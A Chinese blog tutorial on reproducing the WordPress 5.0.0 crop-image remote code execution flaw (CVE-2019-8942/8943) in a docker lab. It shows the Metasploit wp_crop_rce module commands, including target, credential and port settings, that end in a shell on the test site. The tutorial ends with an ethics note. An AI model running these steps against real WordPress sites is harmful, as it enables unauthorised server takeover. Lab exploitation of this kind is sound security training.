网站首页 > 技术教程 正文
百度有不少WordPress 5.0.0 远程代码执行漏洞分析CVE-2019-8942、CVE-2019-8943漏洞复现的文章,但是唯独没有用MSF的,今天就以此篇文章描述一下如何使用msf利用该漏洞一键拿shell权限!!!
漏洞简介
1、此漏洞是由目录遍历以及本地文件包含两部分组成。
2、想要利用此漏洞,需要在目标WordPress站点上拥有至少作者权限访问帐户。
0x001准备环境
由于我们有自己的靶场环境,为了方便,直接docker 拉取现成靶机环境(感谢Medicean)
$ docker pull medicean/vulapps:w_wordpress_7
类型 用户名 密码
Mysql root root
/wp-admin/ admin admin4wp498
/wp-admin/ Author 需要重新设置
启动环境
$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_7
-p 8000:80 前面的8000代表物理机的端口,可随意指定。
首先登陆Author权限的账户,也就是“作者”账户
默认情况下WordPress后台有5个用户角色
Administrator(管理员) Editor(编辑) Author(作者) Contributor(投稿者) Subscriber(订阅者)
打开:http://你的ip:8000//wp-admin/ ,用admin admin4wp498 登陆重置下Author账户密码
点击作者-编辑-新密码-打钩-更新用户
然后退出账号用Author账户登陆(这个docker镜像,用默认Author admin4wp498无法登陆所以需要重新设置)
0x002准备kali
2019.4 space-r7将 WordPress 5.0.0 - Crop-image Shell Upload更新到Metasploit攻击框架中
方式一:# apt install metasploit-framework 更新msf
方式二:手工下来rb并更新进msf攻击框架中
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/wp_crop_rce.rb
打开kali,新建窗口输入msfconsole启动msf
输入:search wp_crop_rce (搜索攻击模块)
需要用到的模块为:exploit/multi/http/wp_crop_rce
use exploit/multi/http/wp_crop_rce ##连接模块
输入:show option ##显示模块设置,这里要设置4个名称 USERNAME、PASSWORD、RHOTS、PORT
set USERNAME author ##WordPress的作者账户名 set PASSWORD 123456 ##作者账户密码 set RHOSTS 192.168.2.152 ##靶机IP set RPORT 8000 ##靶机端口
设置完成后,直接输入 run ,开始自动化拿shell
静等片刻。。。。。。
已拿到shell权限了!!!到这里小伙伴们学会了吗?如果还是没有理解,请私信我吧,或者加入我的圈子《黑客攻防与网络安全实战训练营》
注:网络安全的学习,一定要保证自己的职业道德,学习技术的目标是去维护我们的“信息家园”而不要随意的搞破坏!网络安全靠人民,网络安全为人民!!
猜你喜欢
- 2024-12-27 软件质量保障全流程实践分享 软件质量保证体系是什么
- 2024-12-27 Reshape Global Trade Pattern-China's Opportunities&Challenges
- 2024-12-27 俞敏洪GRE核心词汇 乱序版Word List 32
- 2024-12-27 CBN丨China's stock buyback loan program reaches 35.2 billion yuan in first month
- 2024-12-27 “菜鸟黑客”必用兵器之“渗透测试篇二”
- 2024-12-27 Metasploit渗透测试之在云服务器中使用MSF
- 2024-12-27 China's National?Strategy?for Humanoid Robots: Open-Source Innovation, Industry Standards?and the First Marathon for Humanoid Robots
- 2024-12-27 SpringBoot整合Redis springboot整合redis形成多db配置
- 2024-12-27 msf系列片之vps搭建,黑客的世界你真的了解嘛?
- 2024-12-27 开源国际象棋引擎Stockfish 15正式发布,对局实力再度提升
你 发表评论:
欢迎- 01-11关于Vmware workstation的网络设置
- 01-11使用VMware Workstation虚拟机安装Windows 10详细教程
- 01-11VMware Workstation 17.5.1 Pro for Windows & Linux - 桌面虚拟化软件
- 01-11VMware? Workstation 17 Pro软件中,如何显示 “我的计算机” 选项卡
- 01-11银河麒麟桌面操作系统安装VMware workstation pro
- 01-11VmwareWorkstation17.6安装windows7x64虚拟机后安装vmtools
- 01-11发布VMware Workstation Pro 17.0稳定版
- 01-11VMware Workstation安装ESXi 7安装篇
- 最近发表
-
- 关于Vmware workstation的网络设置
- 使用VMware Workstation虚拟机安装Windows 10详细教程
- VMware Workstation 17.5.1 Pro for Windows & Linux - 桌面虚拟化软件
- VMware? Workstation 17 Pro软件中,如何显示 “我的计算机” 选项卡
- 银河麒麟桌面操作系统安装VMware workstation pro
- VmwareWorkstation17.6安装windows7x64虚拟机后安装vmtools
- 发布VMware Workstation Pro 17.0稳定版
- VMware Workstation安装ESXi 7安装篇
- 如何安装虚拟机(vmware workstation)
- VMware Workstation之网络配置
- 标签列表
-
- sd分区 (65)
- raid5数据恢复 (81)
- 地址转换 (73)
- 手机存储卡根目录 (55)
- tcp端口 (74)
- project server (59)
- 双击ctrl (55)
- 鼠标 单击变双击 (67)
- debugview (59)
- 字符动画 (65)
- flushdns (57)
- ps复制快捷键 (57)
- 清除系统垃圾代码 (58)
- web服务器的架设 (67)
- 16进制转换 (69)
- xclient (55)
- ps源文件 (67)
- filezilla server (59)
- 句柄无效 (56)
- word页眉页脚设置 (59)
- ansys实例 (56)
- 6 1 3固件 (59)
- sqlserver2000挂起 (59)
- vm虚拟主机 (55)
- config (61)
本文暂时没有评论,来添加一个吧(●'◡'●)